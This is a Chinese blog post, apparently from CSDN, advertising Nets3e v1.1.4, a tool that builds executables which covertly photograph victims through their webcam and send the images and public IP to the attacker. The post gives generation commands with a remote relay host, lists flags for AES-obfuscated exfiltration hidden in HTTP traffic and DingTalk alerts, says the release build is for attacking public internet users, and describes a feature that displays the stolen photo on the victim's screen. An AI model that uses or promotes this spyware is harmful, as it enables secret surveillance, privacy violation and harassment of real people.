Nets3e v1.1.4(攻击者在受害者主机上偷拍并弹出受害者个人照片)

Github==>https://github.com/MartinxMax/Nets3e/tree/Nets3e_V1.1.4

首页

历史更新:

Nets3e v1.1.4 新增echo参数,-g -echo,生成payload后,受害者泄露的个人照片将会在受害者的主机上弹出展示
Nets3e v1.1.3 修复受害者无法获取公网IP,新增钉钉实时监控推送
Nets3e v1.1.2 废弃Base64编码传输,新增AES加密选项,将数据包混淆在正常的http请求中,并且进行加密传输,增大被中间人截获数据破解的难度
Nets3e v1.1.1 Nets3e v1.0.0基础上将代码进行了优化瘦身,并且提高稳定性,新增 debug内网最短路径攻击功能(通常用来测试主要功能是否存在异常)

基础使用

#python3 Nets3e.py -h

help.png

公网攻击示例

生成Payload

#python3 Nets3e.py -rh http://xxxx.com:11111 -g

1.png

2.png

公网受害者点击Nets3eClient_release.exe

out.png

公网杀链

Chain_Re.png

局域网攻击示例

生成Payload

#python3 Nets3e.py -g
1-1.png

公网受害者点击Nets3eClient_debug.exe

in.png

局域网杀链

Chain_Debug.png

Payload注意事项

生成前

-dd:开启消息实时推送
-lp:设置本机监听端口(默认10032)
-lh:设置本机监听IP(默认当前网卡IP)
-rh:进行流量转发的远程主机,协议是TCP不过这里要改成HTTP进行生成
-g :生成PAYLOAD,如果你已经生成了payload将无需使用该参数
-salt xxx :将受害者的数据传输前进行AES加密防止中间人嗅探

生成后

Nets3eClient_debug.exe->局域网攻击的调试版本主要用于测试内部网络受害者数据是否能够到达本地机器

Nets3eClient_release.exe->公网攻击的发布版本主要用于攻击公网用户

Nets3e V1.1.3

config.png

配置GETIP.conf

受害者点击exe后,从哪个接口获取公网IP,如果这个API接口不能使用,那么你可以进行手动更换
METHOD:请求方式
GETIP:获取公网IP接口

配置DingTalk.conf

工具启动后将监视消息实时推送至钉钉
TOKEN:钉钉群机器人TOKEN
SECRET:钉钉群机器人签名

DingTalk1.png

使用-dd参数示例

#python3 Nets3e.py -dd
dd1.png

受害者点击debug版本exe

getip.png

自动保存至./IP_Photo/受害者IP.png

ip.png

钉钉推送模块API

DingTalk推送模块分离出单独API,你可以参考以下地址进行使用

钉钉推送API接口

ECHO 参数 让受害者看到自己靓照

echo.png

视频

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值